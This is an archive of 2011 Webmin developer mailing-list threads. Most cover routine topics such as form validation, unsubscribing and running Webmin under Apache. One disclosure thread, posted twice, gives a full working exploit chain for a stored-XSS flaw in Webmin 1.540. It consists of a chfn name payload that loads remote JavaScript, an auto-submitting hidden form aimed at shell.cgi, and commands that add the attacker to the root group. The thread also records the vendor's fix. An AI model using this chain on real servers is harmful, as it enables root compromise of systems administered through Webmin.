webadmin-devel — The webmin development mailing list

[webmin-devel] Question about feature request.

[Dmitry P. <zel...@gm...>]

Hello.
I added a feature request for adding support for force password change at
next login feature in ldap-useradmin with patches attached to the ticket:
https://sourceforge.net/tracker/?func=detail&aid=3415467&group_id=17457&atid=367457

I'd like to know if inclusion of that feature is possible in webmin as it is
now or maybe I need to correct patches somehow?

-- 
Dmitry Pavlov

Re: [webmin-devel] how to unsubscribe?

[Charlie G. <gar...@ze...>]

Good afternoon,

On 13/09/11 at 8:04 AM +0200, Boris Porosin <bor...@gm...> wrote:

>how can I unsubscribe? The form at
>http://www.webmin.com/mailing-devel.html is not working (IE,
>Firefox,...), the requests sent to maj...@we... are rejected
>as there is no such user... So how can I get unsubscribed?

From the message headers:

List-Unsubscribe: <https://lists.sourceforge.net/lists/listinfo/webadmin-devel>, 
    <mailto:web...@li...?subject=unsubscribe>


Charlie

-- 
   Ꮚ Charlie Garrison ♊ <gar...@ze...>
   
O< ascii ribbon campaign - stop html mail - www.asciiribbon.org
〠  http://www.ietf.org/rfc/rfc1855.txt

[webmin-devel] how to unsubscribe?

[Boris P. <bor...@gm...>]

Guys,

how can I unsubscribe? The form at
http://www.webmin.com/mailing-devel.html is not working (IE,
Firefox,...), the requests sent to maj...@we... are rejected
as there is no such user... So how can I get unsubscribed?
Best regards,

Boris

Re: [webmin-devel] Change Interface

[PEOPLES, M. P <mp...@at...>]

What are you trying to do?

Michael Peoples (mp4783)
Senior Systems Manager
AT&T - ATTSI
Office/Cell:  614-886-0923
mpe...@at...<mailto:mpe...@at...>

This e-mail and any files transmitted with it are AT&T property, are confidential, and are intended solely for the use of the individual or entity to whom this email is addressed. If you are not one of the named recipient(s) or otherwise have reason to believe that you have received this message in error, please notify the sender and delete this message immediately from your computer. Any other use, retention, dissemination, forwarding, printing, or copying of this e-mail is strictly prohibited."

From: Yassaman Momeni [mailto:yas...@ya...]
Sent: Monday, September 12, 2011 2:10 AM
To: web...@li...
Subject: [webmin-devel] Change Interface

Can anyone guid me to change the interface of webmin?
I mean I want to customize Graphical panel to what I want.

[webmin-devel] Change Interface

[Yassaman M. <yas...@ya...>]

Can anyone guid me to change the interface of webmin?
I mean I want to customize Graphical panel to what I want.

[webmin-devel] My Email

[Yassaman M. <yas...@ya...>]

yas...@ya...

Re: [webmin-devel] CVE-request: XSS in Webmin 1.540

[Jamie C. <jca...@we...>]

On 13/Jun/2011 06:40 Henri Salo <he...@ne...> wrote ..
> Hi,
> 
> I would like to receive CVE-identifier for this issue in Webmin. References:
> 
> http://seclists.org/fulldisclosure/2011/Apr/393
> 
> Javier Bassi told me that the Bugtraq ID is 47558. Couldn't find this from OSVDB.
> Fixed in commit: https://github.com/webmin/webmin/commit/46e3d3ad195dcdc1af1795c96b6e0dc778fb6881
> which is included to Webmin 1.550 release.
> 
> Should be 2011 identifier.

There is no CVE for this - the original submitter Javier had trouble obtaining one.

Actually, I have no idea where CVEs come from either!

 - Jamie

[webmin-devel] Webmin-Snort

[Gorums <ale...@ir...>]

  Hi!
I am developing a module for Snort. This is based on the old module for 
Snort. How to load Webmin module repository. For the community to help 
me improve.

Thanks.


-----BEGIN PGP MESSAGE-----
Version: GnuPG v1.4.10 (GNU/Linux)

owEBAQX++q0E/mILcHVicmluZy5ncGdNdDcymQENBE10NXMBCADrUeZdANiqPbsL
nrsKkF7E3qqJAluCeeGUjhrmcIg8CphDe/Bw0+CUqi55pXwrQFw8kdHUwwxyCXOn
zLIDPbmt2OVrXt2EC7aUvrs4Q5D2eMZZVYmvzbPa7okqlEJ6C9bbZCUtWF0PwPJV
fK3/JqBvGzc0IMYzxR11vCRpAVGwUOHNnZMM43c6TNyWXFAHgcwFQbPNSsWgadY0
4W9qKGv/Rqr9mrbGfGvWMLtFWsqRNSHWLLuoZKFy9as+5N197tmsEFdHLMKuCQHn
uuu/s28DrAH8r3zPl9yWuAw36ti9ot5IqrwZeTYroNS/YsLnNwyW/yVRntFriVFX
u3a90C2LABEBAAG0WkFsZWphbmRybyBGZXJyYW5kaXogRm9uc2VjYSAoR2VucmFu
ZG8gbWkgcGFyIGRlIGNsYXZlcyBwZ3ApIDxhbGVqYW5kcm8uZm9uc2VjYUBpcmlz
LnVoLmN1PokBPgQTAQIAKAUCTXQ1cwIbAwUJAO1OAAYLCQgHAwIGFQgCCQoLBBYC
AwECHgECF4AACgkQjhVXe1FmzUsGAQgAx0ayXWQFoB5yligDaVjlqvGCGl/+/AqE
HrZc53BSz2UcGa55IrTgZrIjYmVT8zqVhJshh/ftnC9d61YGlK0nq/ObgxOlpIOa
22TzPWs4JUe/i5iy/J8WIcdQp9y60zR9fe/OVQjlJ04tu+CqKlo8fQzI3JKtw47D
M7s1cef/yI50nldZ6FE2Zff15NqLPx6eb84R1UqN7Mv7BP/XCsSiSirOqRVGByWQ
puwU/jfhC/mtVZX+Di2WCvyUfrciIQGsj7Qr71uKvraDvmo10JgegWSL6Xg81eza
jiTyB5MmV/MeNPck8zOs7G54FMnIlbHT/O2mHtCYxteQZha5gBY9brACAAO5AQ0E
TXQ1cwEIAKPW3xiuUt54J00lMulkNSEuARCSnl64mtu1Cbgs2FVd+Ho/ipHrs4Fj
OOtDB7AF3VQFoSHKxUYj/ptQ9u4bt5JhDEykzcIQ2Su+alqwmZfptzgiRPdGKx7t
ZOCY3YIOB8LLu8MEV23CGk5NjcTU4scq/KTgX/dr/10u1wvbVXruM05+lANPBtBe
SX4th3vaVWUQFErYCt9H8a2JXRt8udYeNkn1hrWvclsP5XCBFmm2EqAzlOdBsiRz
UFX6CBbafmuGi0vDEZbPb7MBzapBskgxvqjcz2QRCivDjQsgiooSM2E3KpehLKow
tujvHw8XxYcx4NoI5OQdGCZXIstmmRUAEQEAAYkBJQQYAQIADwUCTXQ1cwIbDAUJ
AO1OAAAKCRCOFVd7UWbNS+ApB/93RgFz458PrNltDI5lYs5FvZbnB6kD2rid6N8y
mue0lzGykac3ZBDBxXMXDPKlJzhHaveMQcfQJDkS8lFUPmIdT4pKyyEcTmxsYu/j
mTwV9iKN0ZnHMOQ6k9MUyxpA5a/+E0/BPvnwD7qUQDZ/o0hyE+XJAEz5Hf6WSaHV
qG5/aSKWl7vUHYGa94OfkdPeZJ3H0lOP6w+bhYeFvmz51/nOrHXXkp3oQ5r+mJJw
tXbjg+btEBY8aySDjNGZ6HzBLWNRaEhg85KJgeaqRwUHo0gEckdzlnspDd2aQsrG
IFq+VEZ4ZTTRCu7Dz0XmZtYL2pKL5JKMEiKTnhllDw5S0eySsAIAAw==
=pmpJ
-----END PGP MESSAGE-----

Re: [webmin-devel] [Full-disclosure] XSS in Webmin 1.540 + exploit for privilege escalation

[Javier B. <jav...@gm...>]

> In what Webmin-release this will be fixed? Do you have CVE-identifier for this yet?

The new version (Webmin 1.550) fixes this vulnerability. I don't have
CVE-id, I tried to contact cve.mitre.org guys with no luck. I have BID
Bugtraq ID: 	47558

Re: [webmin-devel] Problem with text box values

[Isaías S. <isa...@cl...>]

Thanx for the quick answer. The ui_submit was exactly what I was looking
for. I'm still new with webmin and web developement and some things escape
my vision sometimes.

Thanx.


*Isaías Sancho*
Director de proyectos

isa...@cl...
+506 2253-8140
+506 8383-2588



2011/5/20 Jamie Cameron <jca...@we...>

> On 20/May/2011 12:19 Isaías Sancho <isa...@cl...> wrote
> ..
> > Hello,
> >
> > I'm working with webmin to make a web interface to my own program. The
> > problem I have is that I'm creating a text box where I show a certain
> value
> > my program manages. Then the user should modify this value, that's why I
> use
> > a text box. But the user changes are validated only when a 'Modify'
> button
> > is pressed.
> >
> > My question is, how do I check the values that were entered in the text
> > boxes? Where does webmin saves those values?
>
> Do you mean validation on the server side?
>
> If so, a typical form is in a script named like edit.cgi , like :
>
> ...
> print ui_form_start("save.cgi");
> print "Your name: ",ui_textbox("name", "", 40);
> print ui_submit("Save");
> print ui_form_end();
> ...
>
> and validation is done in save.cgi like :
>
> ...
> ReadParse();
> if ($in{'name'} eq '') {
>  error("You didn't enter a name");
>  }
> ...
>
>  - Jamie
>
>
> ------------------------------------------------------------------------------
> What Every C/C++ and Fortran developer Should Know!
> Read this article and learn how Intel has extended the reach of its
> next-generation tools to help Windows* and Linux* C/C++ and Fortran
> developers boost performance applications - including clusters.
> http://p.sf.net/sfu/intel-dev2devmay
> -
> Forwarded by the Webmin development list at web...@we...
> To remove yourself from this list, go to
> http://lists.sourceforge.net/lists/listinfo/webadmin-devel
>
>

Re: [webmin-devel] Problem with text box values

[Jamie C. <jca...@we...>]

On 20/May/2011 12:19 Isaías Sancho <isa...@cl...> wrote ..
> Hello,
> 
> I'm working with webmin to make a web interface to my own program. The
> problem I have is that I'm creating a text box where I show a certain value
> my program manages. Then the user should modify this value, that's why I use
> a text box. But the user changes are validated only when a 'Modify' button
> is pressed.
> 
> My question is, how do I check the values that were entered in the text
> boxes? Where does webmin saves those values?

Do you mean validation on the server side?

If so, a typical form is in a script named like edit.cgi , like :

...
print ui_form_start("save.cgi");
print "Your name: ",ui_textbox("name", "", 40);
print ui_submit("Save");
print ui_form_end();
...

and validation is done in save.cgi like :

...
ReadParse();
if ($in{'name'} eq '') {
  error("You didn't enter a name");
  }
...

 - Jamie

[webmin-devel] Problem with text box values

[Isaías S. <isa...@cl...>]

Hello,

I'm working with webmin to make a web interface to my own program. The
problem I have is that I'm creating a text box where I show a certain value
my program manages. Then the user should modify this value, that's why I use
a text box. But the user changes are validated only when a 'Modify' button
is pressed.

My question is, how do I check the values that were entered in the text
boxes? Where does webmin saves those values?

Cheers.


*Isaías Sancho*
Director de proyectos

isa...@cl...
+506 2253-8140
+506 8383-2588

Re: [webmin-devel] XSS in Webmin 1.540 + exploit for privilege escalation

[Javier B. <jav...@gm...>]

Also escape the username in mass_delete_user.cgi (when
enable/disable/delete feature is used)
There is no possible exploit scenario there, so no security issue, but
also there is not reason to have it unescaped.

On Sat, Apr 23, 2011 at 10:17 PM, Javier Bassi <jav...@gm...> wrote:
> On Sat, Apr 23, 2011 at 10:11 PM, Jamie Cameron <jca...@we...> wrote:
>> Hi Javier,
>>
>> Thanks for reporting this - I hadn't considered this attack
>> vector, as I didn't realize that chfn could be used to modify a user's
>> real name.
>>
>> I have created a fix which you can see at :
>>
>> https://github.com/webmin/webmin/commit/46e3d3ad195dcdc1af1795c96b6e0dc778fb6881
>>
>> Also an update for the Users and Groups module can be found at
>> http://www.webmin.com/updates.html , and will be available from within
>> the Webmin UI.
>>
>>  - Jamie
>
> Thanks for the fast fix!
>
> Javier
>

Re: [webmin-devel] XSS in Webmin 1.540 + exploit for privilege escalation

[Javier B. <jav...@gm...>]

On Sat, Apr 23, 2011 at 10:11 PM, Jamie Cameron <jca...@we...> wrote:
> Hi Javier,
>
> Thanks for reporting this - I hadn't considered this attack
> vector, as I didn't realize that chfn could be used to modify a user's
> real name.
>
> I have created a fix which you can see at :
>
> https://github.com/webmin/webmin/commit/46e3d3ad195dcdc1af1795c96b6e0dc778fb6881
>
> Also an update for the Users and Groups module can be found at
> http://www.webmin.com/updates.html , and will be available from within
> the Webmin UI.
>
>  - Jamie

Thanks for the fast fix!

Javier

Re: [webmin-devel] XSS in Webmin 1.540 + exploit for privilege escalation

[Jamie C. <jca...@we...>]

Hi Javier,

Thanks for reporting this - I hadn't considered this attack
vector, as I didn't realize that chfn could be used to modify a user's
real name.

I have created a fix which you can see at :

https://github.com/webmin/webmin/commit/46e3d3ad195dcdc1af1795c96b6e0dc778fb6881

Also an update for the Users and Groups module can be found at 
http://www.webmin.com/updates.html , and will be available from within
the Webmin UI.

 - Jamie

On 23/Apr/2011 17:46 Javier Bassi <jav...@gm...> wrote ..
> Information
> --------------------
> Name :  XSS vulnerability in Webmin
> Software :  All versions prior to and including 1.540 are affected.
> Vendor Hompeage :  http://www.webmin.com
> Vulnerability Type :  Cross-Site Scripting
> Severity :  Medium
> Researcher :  Javier Bassi <javierbassi [at] gmail [dot] com>
> 
> 
> Description
> ------------------
> Webmin is a web-based interface for system administration for Unix.
> Using any modern web browser, you can setup user accounts, Apache,
> DNS, file sharing and much more.
> https://secure.wikimedia.org/wikipedia/en/wiki/Webmin
> 
> 
> Details
> -------------------
> Webmin is affected by a XSS vulnerability in all versions prior to and
> including 1.540.
> Webmin fails to sanitize $real in useradmin/index.cgi. $real is the
> "Full Name" in the finger information of the user. useradmin/index.cgi
> is the control panel of the "Users & Groups" section in webmin.
> An attacker that has a normal user on the victim's machine could be
> able to change his Full Name with chfn command, inject XSS and execute
> commands as root.
> 
> 
> Timeline:
> -------------------
> 2011.04.24 - announced at my site/informed developers/disclosed at my site.
> 
> 
> Solution:
> -------------------
> wait for updates.
> 
> 
> Developing a exploit:
> -------------------
> With Webmin you can execute shell commands and the only security
> measure Webmin has is checking the Referer in the HTTP headers. So we
> can't use <iframe>, but we can bypass this protection by injecting a
> code that execute a Javascript file that prints a form that
> autosubmits itself to the Webmin's shell.cgi and execute mutiple
> commands in the format command1;command2;...;commandn
> So XSS-->.js-->form-->autosubmit-->shell.cgi
> 
> The injected code will be displayed inside a form, so we need to close
> the original form first with </form>.
> The shell/index.cgi form is the next one:
> 
> </form><form class='ui_form' style="visibility:hidden"
> action='https://zion:10000/shell/index.cgi' method=post
> enctype=multipart/form-data >
> <input class='ui_submit' type=submit value="Execute command:">
> <input class='ui_textbox'type=hidden name="cmd" value="" size=50
> style='width:100%'></td>
> <input class='ui_submit' type=submit name="clear" value="Clear history">
> <input class='ui_hidden' type=hidden name="pwd" value="/root">
> <input class='ui_hidden' type=hidden name="history" value="">
> <input class='ui_hidden' type=hidden name="previous" value="find /usr
> -name sftp-server">
> <input class='ui_hidden' type=hidden name="previous" value="echo
> /usr/lib/sftp-server >> /etc/shells">
> <input class='ui_hidden' type=hidden name="previous" value="cat /etc/shells">
> <input class='ui_hidden' type=hidden name="previous" value="find
> /usr/lib -name sftp-server">
> <input class='ui_hidden' type=hidden name="previous" value="echo
> /usr/lib/openssh/sftp-server >> /etc/shells">
> <input class='ui_submit' type=submit name="doprev" value="Execute
> previous command">
> <select class='ui_select' name="pcmd" ><option value="echo
> /usr/lib/openssh/sftp-server >> /etc/shells" >echo
> /usr/lib/openssh/sftp-server >> /etc/shells
> <option value="find /usr/lib -name sftp-server" >find /usr/lib -name sftp-server
> <option value="cat /etc/shells" >cat /etc/shells
> <option value="echo /usr/lib/sftp-server >> /etc/shells" >echo
> /usr/lib/sftp-server >> /etc/shells
> <option value="find /usr -name sftp-server" >find /usr -name sftp-server
> </select><input type=button name=movecmd value='Edit previous'
> onClick='cmd.value = pcmd.options[pcmd.selectedIndex].value'>
> <input class='ui_submit' type=submit name="clearcmds" value="Clear commands">
> </form>
> 
> We use Javascript to autosubmit it. We add id="lala" in form tag and
> also we add the next script at the end of the code:
> <script>document.getElementById('lala').submit();</script>
> 
> Commands go in 'cmd' input. A nice combination of commands could be:
> chfn -f "safename" neo;usermod -G root neo;usermod -g root neo;killall
> -9 firefox-bin
> So when the admim browse "Users & Groups" this will change the Full
> name of our user 'neo' back to a safe one, makes us root and kill
> firefox. The admin will think firefox crashed and when he goes back to
> "Users and Groups" in Webmin it will not crash again beause we already
> changed our full name.
> To include commands in value="" they must be html escaped: (
> http://www.htmlescape.net/htmlescape_tool.html )
> chfn -f &quot;safename&quot; neo;usermod -G root neo;usermod -g root
> neo;killall -9 firefox-bin
> 
> Now we need a .js file that prints the form + the autosubmit code.
> (thx to http://accessify.com/tools-and-wizards/developer-tools/html-javascript-convertor/
> )
> It will look like this
> 
> document.write("<\/form><form class='ui_form'
> style=\"visibility:hidden\" id=\"lala\"
> action='https:\/\/zion:10000\/shell\/index.cgi' method=post
> enctype=multipart\/form-data >");
> document.write("<input class='ui_submit' type=submit value=\"Execute
> command:\">");
> document.write("<input class='ui_textbox'type=hidden name=\"cmd\"
> value=\"chfn -f &quot;safename&quot; neo;usermod -G root neo;usermod
> -g root neo;killall -9 firefox-bin\" size=50
> style='width:100%'><\/td>");
> document.write("<input class='ui_submit' type=submit name=\"clear\"
> value=\"Clear history\">");
> document.write("<input class='ui_hidden' type=hidden name=\"pwd\"
> value=\"\/root\">");
> document.write("<input class='ui_hidden' type=hidden name=\"history\"
> value=\"\">");
> document.write("<input class='ui_hidden' type=hidden name=\"previous\"
> value=\"find \/usr -name sftp-server\">");
> document.write("<input class='ui_hidden' type=hidden name=\"previous\"
> value=\"echo \/usr\/lib\/sftp-server >> \/etc\/shells\">");
> document.write("<input class='ui_hidden' type=hidden name=\"previous\"
> value=\"cat \/etc\/shells\">");
> document.write("<input class='ui_hidden' type=hidden name=\"previous\"
> value=\"find \/usr\/lib -name sftp-server\">");
> document.write("<input class='ui_hidden' type=hidden name=\"previous\"
> value=\"echo \/usr\/lib\/openssh\/sftp-server >> \/etc\/shells\">");
> document.write("<input class='ui_submit' type=submit name=\"doprev\"
> value=\"Execute previous command\">");
> document.write("<select class='ui_select' name=\"pcmd\" ><option
> value=\"echo \/usr\/lib\/openssh\/sftp-server >> \/etc\/shells\" >echo
> \/usr\/lib\/openssh\/sftp-server >> \/etc\/shells");
> document.write("<option value=\"find \/usr\/lib -name sftp-server\"
> >find \/usr\/lib -name sftp-server");
> document.write("<option value=\"cat \/etc\/shells\" >cat \/etc\/shells");
> document.write("<option value=\"echo \/usr\/lib\/sftp-server >>
> \/etc\/shells\" >echo \/usr\/lib\/sftp-server >> \/etc\/shells");
> document.write("<option value=\"find \/usr -name sftp-server\" >find
> \/usr -name sftp-server");
> document.write("<\/select><input type=button name=movecmd value='Edit
> previous' onClick='cmd.value =
> pcmd.options[pcmd.selectedIndex].value'>");
> document.write("<input class='ui_submit' type=submit
> name=\"clearcmds\" value=\"Clear commands\">");
> document.write("<\/form><script>document.getElementById('lala').submit();<\/script>");
> 
> We have to upload the file somewhere and use a url shotener.
> 
> Now we need the script code that loads the .js file. Linux program
> chfn limits the Full name field to 80 chars and restrict the next
> three chars:
>  = (equal) , (comma) or : (colon)
> The XSS code we can use is the next one (tested in FF4.0):
> <script>document.write("<script src\u003d//bit.ly/g2KmJP></scr"+"ipt>")</script>
> (this code bypass NoScript anti-XSS protection)
> 
> To perform the exploit we have login and change our finger information
> 
> neo@Zion ~ $ chfn
> Password:
> Changing the user information for neo
> Enter the new value, or press ENTER for the default
> 	Full Name [safename]: <script>document.write("<script
> src\u003d//bit.ly/g2KmJP></scr"+"ipt>")</script>
> 	Room Number []:
> 	Work Phone []:
> 	Home Phone []:
> neo@Zion ~ $
> 
> Finally we wait for the admin to invite us to join the root group ;)
> 
> 
> Other considerations
> -------------------
> * The "//" in the XSS code is equal to "http://" only in the cases in
> which the code is placed in an http:// website. Because Webmin panel
> is https:// we need a URL shortener service with SSL and a valid
> certificate. That's why I used bit.ly. The shortest ones like goo.gl
> and sr.pr don't have valid SSL ceterfiticate so a warning will appear
> in most browsers when trying to access them via https asking us if we
> want to continue. In an exploit scenario we can't use them.
> * We will be able to modify our Full Name with chfn only if constant
> CHFN_RESTRICT is set to "frwh" in /etc/login.defs. This is the default
> config in Mandriva and Slackware but not in Debian which is set to
> "rwh". I don't know about other distros.
> * With XSS we could have also steal admin's cookie but it's most
> likely that NoScript will block that attack. The reason why NS can't
> block this one is because is not exactly a typical cross-domain XSS.
> This is HTML injection or permanent XSS.
> 
> 
> Credits
> -------------------
> Javier Bassi- http://javierb.com.ar
> Special thanks to barbarianbob from sla.ckers.org for compressing the
> XSS from 92 chars to 80.
> 
> 
> References
> -------------------
> 1. Advisory URL: http://javierb.com.ar/2011/04/24/xss-webmin-1-540/
> 2. Exploit in action: http://www.youtube.com/watch?v=CUO7JLIGUf0
> 
> ------------------------------------------------------------------------------
> Fulfilling the Lean Software Promise
> Lean software platforms are now widely adopted and the benefits have been 
> demonstrated beyond question. Learn why your peers are replacing JEE 
> containers with lightweight application servers - and what you can gain 
> from the move. http://p.sf.net/sfu/vmware-sfemails
> -
> Forwarded by the Webmin development list at web...@we...
> To remove yourself from this list, go to
> http://lists.sourceforge.net/lists/listinfo/webadmin-devel

[webmin-devel] XSS in Webmin 1.540 + exploit for privilege escalation

[Javier B. <jav...@gm...>]

Information
--------------------
Name :  XSS vulnerability in Webmin
Software :  All versions prior to and including 1.540 are affected.
Vendor Hompeage :  http://www.webmin.com
Vulnerability Type :  Cross-Site Scripting
Severity :  Medium
Researcher :  Javier Bassi <javierbassi [at] gmail [dot] com>


Description
------------------
Webmin is a web-based interface for system administration for Unix.
Using any modern web browser, you can setup user accounts, Apache,
DNS, file sharing and much more.
https://secure.wikimedia.org/wikipedia/en/wiki/Webmin


Details
-------------------
Webmin is affected by a XSS vulnerability in all versions prior to and
including 1.540.
Webmin fails to sanitize $real in useradmin/index.cgi. $real is the
"Full Name" in the finger information of the user. useradmin/index.cgi
is the control panel of the "Users & Groups" section in webmin.
An attacker that has a normal user on the victim's machine could be
able to change his Full Name with chfn command, inject XSS and execute
commands as root.


Timeline:
-------------------
2011.04.24 - announced at my site/informed developers/disclosed at my site.


Solution:
-------------------
wait for updates.


Developing a exploit:
-------------------
With Webmin you can execute shell commands and the only security
measure Webmin has is checking the Referer in the HTTP headers. So we
can't use <iframe>, but we can bypass this protection by injecting a
code that execute a Javascript file that prints a form that
autosubmits itself to the Webmin's shell.cgi and execute mutiple
commands in the format command1;command2;...;commandn
So XSS-->.js-->form-->autosubmit-->shell.cgi

The injected code will be displayed inside a form, so we need to close
the original form first with </form>.
The shell/index.cgi form is the next one:

</form><form class='ui_form' style="visibility:hidden"
action='https://zion:10000/shell/index.cgi' method=post
enctype=multipart/form-data >
<input class='ui_submit' type=submit value="Execute command:">
<input class='ui_textbox'type=hidden name="cmd" value="" size=50
style='width:100%'></td>
<input class='ui_submit' type=submit name="clear" value="Clear history">
<input class='ui_hidden' type=hidden name="pwd" value="/root">
<input class='ui_hidden' type=hidden name="history" value="">
<input class='ui_hidden' type=hidden name="previous" value="find /usr
-name sftp-server">
<input class='ui_hidden' type=hidden name="previous" value="echo
/usr/lib/sftp-server >> /etc/shells">
<input class='ui_hidden' type=hidden name="previous" value="cat /etc/shells">
<input class='ui_hidden' type=hidden name="previous" value="find
/usr/lib -name sftp-server">
<input class='ui_hidden' type=hidden name="previous" value="echo
/usr/lib/openssh/sftp-server >> /etc/shells">
<input class='ui_submit' type=submit name="doprev" value="Execute
previous command">
<select class='ui_select' name="pcmd" ><option value="echo
/usr/lib/openssh/sftp-server >> /etc/shells" >echo
/usr/lib/openssh/sftp-server >> /etc/shells
<option value="find /usr/lib -name sftp-server" >find /usr/lib -name sftp-server
<option value="cat /etc/shells" >cat /etc/shells
<option value="echo /usr/lib/sftp-server >> /etc/shells" >echo
/usr/lib/sftp-server >> /etc/shells
<option value="find /usr -name sftp-server" >find /usr -name sftp-server
</select><input type=button name=movecmd value='Edit previous'
onClick='cmd.value = pcmd.options[pcmd.selectedIndex].value'>
<input class='ui_submit' type=submit name="clearcmds" value="Clear commands">
</form>

We use Javascript to autosubmit it. We add id="lala" in form tag and
also we add the next script at the end of the code:
<script>document.getElementById('lala').submit();</script>

Commands go in 'cmd' input. A nice combination of commands could be:
chfn -f "safename" neo;usermod -G root neo;usermod -g root neo;killall
-9 firefox-bin
So when the admim browse "Users & Groups" this will change the Full
name of our user 'neo' back to a safe one, makes us root and kill
firefox. The admin will think firefox crashed and when he goes back to
"Users and Groups" in Webmin it will not crash again beause we already
changed our full name.
To include commands in value="" they must be html escaped: (
http://www.htmlescape.net/htmlescape_tool.html )
chfn -f &quot;safename&quot; neo;usermod -G root neo;usermod -g root
neo;killall -9 firefox-bin

Now we need a .js file that prints the form + the autosubmit code.
(thx to http://accessify.com/tools-and-wizards/developer-tools/html-javascript-convertor/
)
It will look like this

document.write("<\/form><form class='ui_form'
style=\"visibility:hidden\" id=\"lala\"
action='https:\/\/zion:10000\/shell\/index.cgi' method=post
enctype=multipart\/form-data >");
document.write("<input class='ui_submit' type=submit value=\"Execute
command:\">");
document.write("<input class='ui_textbox'type=hidden name=\"cmd\"
value=\"chfn -f &quot;safename&quot; neo;usermod -G root neo;usermod
-g root neo;killall -9 firefox-bin\" size=50
style='width:100%'><\/td>");
document.write("<input class='ui_submit' type=submit name=\"clear\"
value=\"Clear history\">");
document.write("<input class='ui_hidden' type=hidden name=\"pwd\"
value=\"\/root\">");
document.write("<input class='ui_hidden' type=hidden name=\"history\"
value=\"\">");
document.write("<input class='ui_hidden' type=hidden name=\"previous\"
value=\"find \/usr -name sftp-server\">");
document.write("<input class='ui_hidden' type=hidden name=\"previous\"
value=\"echo \/usr\/lib\/sftp-server >> \/etc\/shells\">");
document.write("<input class='ui_hidden' type=hidden name=\"previous\"
value=\"cat \/etc\/shells\">");
document.write("<input class='ui_hidden' type=hidden name=\"previous\"
value=\"find \/usr\/lib -name sftp-server\">");
document.write("<input class='ui_hidden' type=hidden name=\"previous\"
value=\"echo \/usr\/lib\/openssh\/sftp-server >> \/etc\/shells\">");
document.write("<input class='ui_submit' type=submit name=\"doprev\"
value=\"Execute previous command\">");
document.write("<select class='ui_select' name=\"pcmd\" ><option
value=\"echo \/usr\/lib\/openssh\/sftp-server >> \/etc\/shells\" >echo
\/usr\/lib\/openssh\/sftp-server >> \/etc\/shells");
document.write("<option value=\"find \/usr\/lib -name sftp-server\"
>find \/usr\/lib -name sftp-server");
document.write("<option value=\"cat \/etc\/shells\" >cat \/etc\/shells");
document.write("<option value=\"echo \/usr\/lib\/sftp-server >>
\/etc\/shells\" >echo \/usr\/lib\/sftp-server >> \/etc\/shells");
document.write("<option value=\"find \/usr -name sftp-server\" >find
\/usr -name sftp-server");
document.write("<\/select><input type=button name=movecmd value='Edit
previous' onClick='cmd.value =
pcmd.options[pcmd.selectedIndex].value'>");
document.write("<input class='ui_submit' type=submit
name=\"clearcmds\" value=\"Clear commands\">");
document.write("<\/form><script>document.getElementById('lala').submit();<\/script>");

We have to upload the file somewhere and use a url shotener.

Now we need the script code that loads the .js file. Linux program
chfn limits the Full name field to 80 chars and restrict the next
three chars:
 = (equal) , (comma) or : (colon)
The XSS code we can use is the next one (tested in FF4.0):
<script>document.write("<script src\u003d//bit.ly/g2KmJP></scr"+"ipt>")</script>
(this code bypass NoScript anti-XSS protection)

To perform the exploit we have login and change our finger information

neo@Zion ~ $ chfn
Password:
Changing the user information for neo
Enter the new value, or press ENTER for the default
	Full Name [safename]: <script>document.write("<script
src\u003d//bit.ly/g2KmJP></scr"+"ipt>")</script>
	Room Number []:
	Work Phone []:
	Home Phone []:
neo@Zion ~ $

Finally we wait for the admin to invite us to join the root group ;)


Other considerations
-------------------
* The "//" in the XSS code is equal to "http://" only in the cases in
which the code is placed in an http:// website. Because Webmin panel
is https:// we need a URL shortener service with SSL and a valid
certificate. That's why I used bit.ly. The shortest ones like goo.gl
and sr.pr don't have valid SSL ceterfiticate so a warning will appear
in most browsers when trying to access them via https asking us if we
want to continue. In an exploit scenario we can't use them.
* We will be able to modify our Full Name with chfn only if constant
CHFN_RESTRICT is set to "frwh" in /etc/login.defs. This is the default
config in Mandriva and Slackware but not in Debian which is set to
"rwh". I don't know about other distros.
* With XSS we could have also steal admin's cookie but it's most
likely that NoScript will block that attack. The reason why NS can't
block this one is because is not exactly a typical cross-domain XSS.
This is HTML injection or permanent XSS.


Credits
-------------------
Javier Bassi- http://javierb.com.ar
Special thanks to barbarianbob from sla.ckers.org for compressing the
XSS from 92 chars to 80.


References
-------------------
1. Advisory URL: http://javierb.com.ar/2011/04/24/xss-webmin-1-540/
2. Exploit in action: http://www.youtube.com/watch?v=CUO7JLIGUf0

Re: [webmin-devel] CORRECTION - PROBLEM NOT SOLVEDRE:Stumbling Forward RE: Getting Webmin torununderApacheforSolaris10-- Creating dent in desk from banging head.

[PEOPLES, M. P (ATTSI) <mp...@at...>]

I made this point earlier, which is why I went the suexec route, which it the proper way to achieve this with this configuration.

I suppose I could change some ownership values on the system.   Apache doesn't even have a home directory, another Apache security measure, so maybe if apache or (perhaps better) its group owned the files.  Something like: chown -R root:webmin

I guess it can't hurt to try.  I wrote scripts to flip the active webmin directories from a "standard" installation, to an Apache installation, so it shouldn't be too difficult.

Michael Peoples
Senior Systems Manager
AT&T - ATTSI
Office:            614-789-8559
Cell:    614-886-0923
FAX:   614-789-8975
mpe...@at...

This e-mail and any files transmitted with it are AT&T property, are confidential, and are intended solely for the use of the individual or entity to whom this email is addressed. If you are not one of the named recipient(s) or otherwise have reason to believe that you have received this message in error, please notify the sender and delete this message immediately from your computer. Any other use, retention, dissemination, forwarding, printing, or copying of this e-mail is strictly prohibited."


-----Original Message-----
From: Joe Cooper [mailto:jo...@vi...] 
Sent: Monday, March 21, 2011 4:32 PM
To: web...@li...
Subject: Re: [webmin-devel] CORRECTION - PROBLEM NOT SOLVEDRE:Stumbling Forward RE: Getting Webmin torununderApacheforSolaris10-- Creating dent in desk from banging head.

It would work if you can convince Apache to run CGIs as root...but the 
Apache folks go to great lengths to make that difficult to do, because 
of the horrendous security implications and the burden of auditing that 
much code. I've done it in the distant past, in pre-Webmin days, but 
have no recollection of how I did it, and suspect it would be very 
different today (I'm pretty sure suexec didn't exist back then, for 
instance). Webmin's miniserv.pl, by comparison, is miniscule, and 
written in a much higher level language with none of the common security 
concerns found in C code, where the program manages its own memory.

I question this assertion, as well: "What Apache would allow would be a 
richer tool set for extending functionality."

What specific functionality did you have in mind? miniserv.pl is written 
in Perl, and thus extremely easy to extend (though I'm always leery of 
touching the security-sensitive portions of Webmin, and miniserv is 
perhaps the most security-sensitive part of the whole package). I'm not 
saying Apache isn't a richer toolset...I'm just not sure how most of its 
tools would apply to Webmin.

Perhaps you can tell us what you're trying to accomplish, and we can 
lend some advice on those specific goals...maybe Apache will provide 
benefits for your particular case, but I'm currently doubtful of that. 
